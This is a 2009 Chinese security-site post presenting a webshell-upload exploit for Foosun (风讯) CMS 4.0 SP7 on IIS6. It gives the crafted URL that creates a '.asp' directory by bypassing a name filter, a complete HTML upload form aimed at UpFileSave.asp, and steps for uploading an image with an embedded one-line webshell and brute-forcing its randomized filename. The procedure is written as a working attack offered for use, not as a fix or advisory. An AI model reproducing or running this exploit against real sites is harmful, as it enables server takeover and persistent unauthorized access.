首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
风讯 4.0 SP7 getshell 0day
来源:http://www.0kee.com/read.php?tid-1041.html 作者:bink 发布时间:2009-07-13  

发现者:bloodsword、bink,转载请无视
影响版本:<=4.0 sp7,前面的版本没去看,估计也能日。
利用条件,开启了文件上传功能,iis6环境。

漏洞描述:建立目录的地方,名称过滤上有失误,导致可以绕过过滤建立一个.asp目录
首先注册个账号访问http://www.bbb.com/User/CommPages /FolderImageList.asp?f_UserNumber=06150583700&Type=AddFolder& Path=/userfiles/06150583700/aaa.asp//&CurrPath=/userfiles /06150583700其中这个06150583700是你的userid,登录了直接可以看到,建立一个.asp目录

因为风讯浏览目录的地方也过滤了.,所以建立的子目录进不去。本地构造表单:

 

<form name="FileForm" method="post" enctype="multipart/form-data" action="http://www.bbb.com/User/Commpages/UpFileSave.asp?Path=/userfiles/06150583700/aaa.asp">
    <input type="hidden" name="AutoReName" value="2"><br>
    <input type="hidden" name="Path" value="/userfiles/06150583700/aaa.asp">
    <input type="file" size="20" name="File1">
    <input type="hidden" name="FilesNum" value="1">
    <input type="submit" id="BtnSubmit" name="Submit" value=" 确 定 ">
    <input type="reset" id="ResetForm" name="Submit3" value=" 重 填 ">
</form>

传个夹带一句话的图片上去
恶心的地方来了,传上去的文件名是日期+时间+5位随机数(可能是4位3位2位1位,反正最大5位),这个我跟bink研究了半天,没有

办法看到-_-,用管中窥豹有个暴力猜接上传路径的功能,先在正常目录里上传个文件,卡一下本地跟远程的时间差,然后传到.asp

目录里,把秒数误差控制在3秒以内,开始跑吧~~然后自己该干嘛干嘛去,RP过关的话几个小时内应该能出结果-_-


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·Joomla! HTTP头跨站脚本执行漏洞
·Sun One WebServer 6.1 JSP Sour
·Discuz! admin\styles.inc.php g
·黑洞的ASP上线系统的一个漏洞
·DirectShow 0DAY第二波警告
·四通政府CMS管理系统的union注入
·第一回:DOM沙盒 vs 跨網站腳本
·FF3的《moz-binding: url》未限
·老Y文章管理系统注射0day
·乘风多用户PHP统计系统 v4.0 注
·Php168的一个本地文件包含漏洞
·ToolTalk rpc.ttdbserverd _tt_i
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved